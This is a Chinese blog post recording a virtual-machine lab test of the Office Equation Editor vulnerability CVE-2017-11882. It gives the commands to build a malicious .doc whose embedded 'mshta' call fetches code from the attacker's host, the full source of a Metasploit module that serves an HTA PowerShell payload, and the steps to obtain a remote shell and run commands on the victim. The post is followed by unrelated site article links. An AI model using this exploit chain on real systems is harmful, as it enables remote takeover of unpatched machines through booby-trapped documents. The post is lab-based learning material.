Office隱藏17年的漏洞CVE_2017_11882測試記錄

来源:http://www.cnblogs.com/lxmwb/archive/2017/11/25/7894742.html
-Advertisement-
Play Games

打開文檔變肉雞:潛伏17年的“噩夢公式”Office漏洞攻擊分析 微軟的11月份的安全補丁包含了一個隱藏17年之久的Office遠程代碼執行漏洞(CVE-2017-11882),該漏洞影響目前所有流行的Office軟體。 ...


 

Office隱藏17年的漏洞CVE_2017_11882測試記錄

創建時間: 2017/11/25 0:18
作者: CN_Simo
標簽: Office漏洞

 

參考文章1:https://www.cnblogs.com/Oran9e/p/7880832.html 參考文章2:https://www.cnblogs.com/i-honey/p/7885573.html   POC地址:https://github.com/Ridter/CVE-2017-11882/   中間環節出現,msf連接資料庫失敗的情況,解決方法:https://www.cnblogs.com/justforfun12/p/5205804.html   1.製造條件     這裡搭建兩台虛擬機進行測試!   測試機配置信息:  
操作系統 Win7_x64 企業版
Office版本 Office 2013
防火牆狀態 開啟
IP 192.168.1.103
系統語言 Chinese
   
操作系統 Kali 2.1 中文
IP 192.168.1.104
  首先在kali下安裝nginx,或者tomcat應該也是可以的,首先將生成的doc文件放在/usr/share/nginx/html目錄下,方便被攻擊的機器獲取doc文件。   啟動nginx服務:systemctl start nginx   使用Command43b_CVE-2017-11882.py生成doc文件 python Command43b_CVE-2017-11882.py -c "mshta http://192.168.1.104:8080/abc";; -o cev2.doc # 將下載好的漏洞模塊放在msf任意目錄下 root@kali:/# mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ cve_2017_11882.rb的內容如下: ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule  < Msf::Exploit::Remote   Rank = NormalRanking   include Msf::Exploit::Remote::HttpServer   def initialize(info  = {})     super(update_info(info,       'Name' => 'Microsoft Office Payload Delivery',       'Description' => %q{         This module generates an command to place within         a word document, that when executed, will retrieve a HTA payload         via HTTP from an web server. Currently have not figured out how         to generate a doc.       },       'License' => MSF_LICENSE,       'Arch' => ARCH_X86,       'Platform' => 'win',       'Targets' =>         [           ['Automatic', {} ],         ],       'DefaultTarget' => 0,     ))   end   def on_request_uri(cli, _request)     print_status("Delivering payload")     p = regenerate_payload(cli)     data = Msf::Util::EXE.to_executable_fmt(       framework,       ARCH_X86,       'win',       p.encoded,       'hta-psh',       { :arch => ARCH_X86, :platform => 'win '}     )     send_response(cli, data, 'Content-Type' => 'application/hta')   end   def primer     url = get_uri     print_status("Place the following DDE in an MS document:")     print_line("mshta.exe \"#{url}\"")   end   然後,這裡在使用msfconsole之前,需要先打開資料庫,例如 service postgresql start  打開資料庫之後,進入msfconsole,然後對msf進行初始化,執行msf init 之後search cve_2017_11882搜索漏洞模塊,然後按照【參考文章2】進行配置,最後 exploit 之後啟動對 8080 埠的監聽,至於為什麼是8080埠我也不太清楚啊!   2.萬事俱備,只欠東風   這個時候,只需要在 win7 上通過瀏覽器的到 cve2.doc文檔,打開之後,kali中命令行立刻顯示已經獲取到了連接, session命令得到回話,session -i 【id】建立連接 shell命令可以得到cmd,執行net user查看用戶   3.實驗效果   通過這個漏洞,可以肆無忌憚的執行一些命令,例如關機,刪除一些文件,收集一些系統信息還是非常有用的 在桌面新建文件夾 遠程關機 雖然獲取到了命令行,但是通過net user命令可以看到登錄的用戶級別是Guest,這就限制了一些需要許可權較高的命令執行! 而且這裡win7沒有安裝殺軟,我不知道安裝殺軟之後word文檔會不會被查殺呢?  

 


您的分享是我們最大的動力!

-Advertisement-
Play Games
更多相關文章
  • 面向對象與原型
    說真的,學習JavaScript時,面向對象與原型這章特別考驗你的編程基礎能力,邏輯性很強,初學時,整個人都是懵逼的狀態,現在依然有點,每個函數的封裝方式都是從缺點最多的寫法進入,再一步一步深入,不斷優化函數,最終,使得自己寫出的函數能夠代碼精簡,並且相容性好,下麵我就分享下最基礎的工廠模式吧!(創 ...
  • vue日誌demo,增刪改查的練習(無vuex版本)
    安裝 1. 確定電腦已裝node和npm 出現版本號則說明電腦已經安裝好node和npm2. 創建一個基於webpack的項目 3. 在項目里安裝依賴 4. 運行 配置路由為了動態渲染各個頁面的組件,這個是必須的,這些都在router文件夾里的index.js配置好,在components文件夾在下 ...
  • 記CSS格式化上下文
    fomatting context 引言 主要講解的是BFC上下文 本文是查看 "史上最全面、最透徹的BFC原理剖析" 的筆記 所以不會詳解BFC, 只是記錄學習心得, 以及重要規則避免原文失效 簡介 Formatting context是W3C CSS2.1規範中的一個概念。它是頁面中的一塊渲染區 ...
  • window環境下npm install node-sass報錯
    最近準備想用vue-cli初始化一個項目,需要sass-loader編譯; 發現window下npm install node-sass和sass-loader一直報錯, window 命令行中提示我全局安裝 node-gyp ,有些提示好像是本地找不到python, 於是我按照提示安裝node-g ...
  • iOS-PYSearch完美搜索頁
    APP搜索頁基本上是少不了的,熱門搜索、搜索記錄等;這裡推薦一個大牛ko1o寫的:PYSearch,他還有一個不錯的圖片瀏覽開源:PYPhotoBrowser;這個也不錯,感興趣的可以瞭解下;下麵說下PYSearch的主要功能及(原Gitdemo)效果; 熱門搜索風格 PYHotSearchStyl ...
  • 【代碼筆記】iOS-HTTPQueue下載圖片
    一,工程圖。 二,代碼。 ViewController.h ViewController.m ...
  • 2017.11.25 中斷與數位管動態顯示
    數組基本概念: 1、具有相同的數據類型 2、具有相同的名字 3、在存儲器中的存儲是連續的 註意:區分數組下標和數組元素個數的概念,數組下標可以是常量或變數,數組賦值只能在初始化進行,程式只能進行單個元素賦值。 switch() { case 常量表達式1: 語句1;break; default 常量 ...
  • Linux入門基礎篇
    Linux入門基礎篇 Linux誕生 Linux發行版本說明 Linux官方網站 Linux內核官方網站 比較有名的Linux發行版 虛擬機(Virtual Machine),一個虛擬的系統,安裝在系統中的系統 Linux與Windows的不同 Linux基本命令入門 Windows命令行入門(搜索 ...
一周排行
    -Advertisement-
    Play Games
  • 移動開發(一):使用.NET MAUI開發第一個安卓APP
    移動開發(一):使用.NET MAUI開發第一個安卓APP 對於工作多年的C#程式員來說,近來想嘗試開發一款安卓APP,考慮了很久最終選擇使用.NET MAUI這個微軟官方的框架來嘗試體驗開發安卓APP,畢竟是使用Visual Studio開發工具,使用起來也比較的順手,結合微軟官方的教程進行了安卓 ...
  • wpf ToggleButton選中效果和一個登錄界面
    前言 QuestPDF 是一個開源 .NET 庫,用於生成 PDF 文檔。使用了C# Fluent API方式可簡化開發、減少錯誤並提高工作效率。利用它可以輕鬆生成 PDF 報告、發票、導出文件等。 項目介紹 QuestPDF 是一個革命性的開源 .NET 庫,它徹底改變了我們生成 PDF 文檔的方 ...
  • 彈幕樹洞項目功能新增篇
    項目地址 項目後端地址: https://github.com/ZyPLJ/ZYTteeHole 項目前端頁面地址: ZyPLJ/TreeHoleVue (github.com) https://github.com/ZyPLJ/TreeHoleVue 目前項目測試訪問地址: http://tree ...
  • 第27篇 sqlserver2022詳細安裝步驟
    話不多說,直接開乾 一.下載 1.官方鏈接下載: https://www.microsoft.com/zh-cn/sql-server/sql-server-downloads 2.在下載目錄中找到下麵這個小的安裝包 SQL2022-SSEI-Dev.exe,運行開始下載SQL server; 二. ...
  • .NET 開源高性能 MQTT 類庫
    前言 隨著物聯網(IoT)技術的迅猛發展,MQTT(消息隊列遙測傳輸)協議憑藉其輕量級和高效性,已成為眾多物聯網應用的首選通信標準。 MQTTnet 作為一個高性能的 .NET 開源庫,為 .NET 平臺上的 MQTT 客戶端與伺服器開發提供了強大的支持。 本文將全面介紹 MQTTnet 的核心功能 ...
  • Serilog文檔翻譯系列(六) - 可用的接收器、增強器、格式化輸出
    Serilog支持多種接收器用於日誌存儲,增強器用於添加屬性,LogContext管理動態屬性,支持多種輸出格式包括純文本、JSON及ExpressionTemplate。還提供了自定義格式化選項,適用於不同需求。 ...
  • 警惕 Visual Studio 屬性求值副作用導致邏輯不符合預期
    目錄簡介獲取 HTML 文檔解析 HTML 文檔測試參考文章 簡介 動態內容網站使用 JavaScript 腳本動態檢索和渲染數據,爬取信息時需要模擬瀏覽器行為,否則獲取到的源碼基本是空的。 本文使用的爬取步驟如下: 使用 Selenium 獲取渲染後的 HTML 文檔 使用 HtmlAgility ...
  • [使用目前最新版]HybridCLR6.9.0+YooAsset2.2.4實現純C# Unity熱更新方案 (一)
    1.前言 什麼是熱更新 游戲或者軟體更新時,無需重新下載客戶端進行安裝,而是在應用程式啟動的情況下,在內部進行資源或者代碼更新 Unity目前常用熱更新解決方案 HybridCLR,Xlua,ILRuntime等 Unity目前常用資源管理解決方案 AssetBundles,Addressable, ...
  • 在 ASP.NET Core Web API 中使用操作篩選器統一處理通用操作
    本文章主要是在C# ASP.NET Core Web API框架實現向手機發送驗證碼簡訊功能。這裡我選擇是一個互億無線簡訊驗證碼平臺,其實像阿裡雲,騰訊雲上面也可以。 首先我們先去 互億無線 https://www.ihuyi.com/api/sms.html 去註冊一個賬號 註冊完成賬號後,它會送 ...
  • 第28篇 如何.net中實現高效可靠數據同步api
    通過以下方式可以高效,並保證數據同步的可靠性 1.API設計 使用RESTful設計,確保API端點明確,並使用適當的HTTP方法(如POST用於創建,PUT用於更新)。 設計清晰的請求和響應模型,以確保客戶端能夠理解預期格式。 2.數據驗證 在伺服器端進行嚴格的數據驗證,確保接收到的數據符合預期格 ...
所有分類